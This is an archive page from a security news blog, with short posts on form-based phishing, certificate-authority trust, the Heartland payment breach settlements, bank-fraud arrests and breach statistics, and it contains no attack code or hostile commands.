The Security Pub

Random Thoughts About Security

Category Archives: Breaches

Form Based Phishing Attacks are on the RISE

As always, spammers are keeping abreast with the important events of the season’s, and know that January is when the public usually submits tax returns and starts getting refunds. Websense is reporting that the form-based approach is being used more frequently than the usual direct links to phishing sites.

What are form-based email attacks?

Form-based attacks is just another type of phishing attack.  Instead of using a link to take the user to a phishing site, the hacker includes a form that the user is asked to complete. When the user completes the form and submits it, the details are then sent to the attacker. Here is a short video that shows an example.

UAE Man-in-the-Middle Attack Against SSL

Who are these certificate authorities? At the beginning of Web history, there were only a handful of companies, like Verisign, Equifax, and Thawte, that made near-monopoly profits from being the only providers trusted by Internet Explorer or Netscape Navigator. But over time, browsers have trusted more and more organizations to verify Web sites. Safari and Firefox now trust more than 60 separate certificate authorities by default. Microsoft’s software trusts more than 100 private and government institutions.

Read the full article –  [Schneier on Security]

Heartland Set To Pay Discover $5M For 2008 Data Breach

Heartland Payment Systems has agreed to pay $5 million to Discover to settle claims arising from the massive data breach disclosed by the payment processor last year.

In a brief statement on Wednesday, the Princeton, N.J.-based Heartland said the settlement “resolves all issues” between the two companies stemming from the intrusion.

“This settlement marks our final agreement with a card brand related to the intrusion,” Heartland CEO Robert Carr said in the statement.

In January, Heartland agreed to set aside $60 million to reimburse banks issuing Visa cards, for breach-related costs. Heartland has also agreed to pay $3.6 million to settle claims brought against it by American Express and more than $41 million to reimburse MasterCard issuers for breach-related costs.

In addition to settling with the major card brands, Heartland also has offered to pay $4 million to settle a consolidated consumer class action lawsuit being heard in Texas.

All of the settlement money has come from the $140 million Heartland set aside to cover the costs related to the breach. That amount includes more than $26 million in legal costs.

Heartland, one of the largest processors of payment card transactions in the U.S., disclosed in January 2009 that hackers had broken into its systems in 2008 and stolen credit and debit card data. Authorities later said that data on as many as 130 million credit and debit cards had been stolen, making it the largest ever breach involving payment card data.

The intrusions at Heartland and several other major retailers were later traced to a gang of cyber thieves led by Miami-based Albert Gonzalez who was sentenced in March to 20 years in federal prison.

Source: ComputerWorld

Six arrested for compromising 10,000 online bank accounts

ccs Six people have been arrested on suspicion of stealing credit cards, personal information and banking details as part of a suspected online banking fraud.

On Tuesday 3 and Wednesday 4 August 2010, officers from the Metropolitan Police Service’s (MPS) Police Central e-Crime Unit (PCeU), assisted by the MPS Territorial Support Group and the Irish Garda Síochána Fraud Investigation Bureau, executed five search warrants across London and at an address in Navan, County Meath, Ireland.

 

Check out the article – [Help Net Security]

Data Breaches Blamed on Organized Crime

Data Breach Cybercrooks continue to be a menace to corporate security, with hackers and malware authors responsible for 85% of all stolen data.  Data breaches crop up in all types of industries but financial services, hospitality and retail still make up the “Big Three” of industries affected (accounting for 33%, 23% and 15% of incidents, respectively). However, a huge majority (94%) of all compromised records in 2009 were attributable to breaches at financial service firms.

Check out the article – [The Register]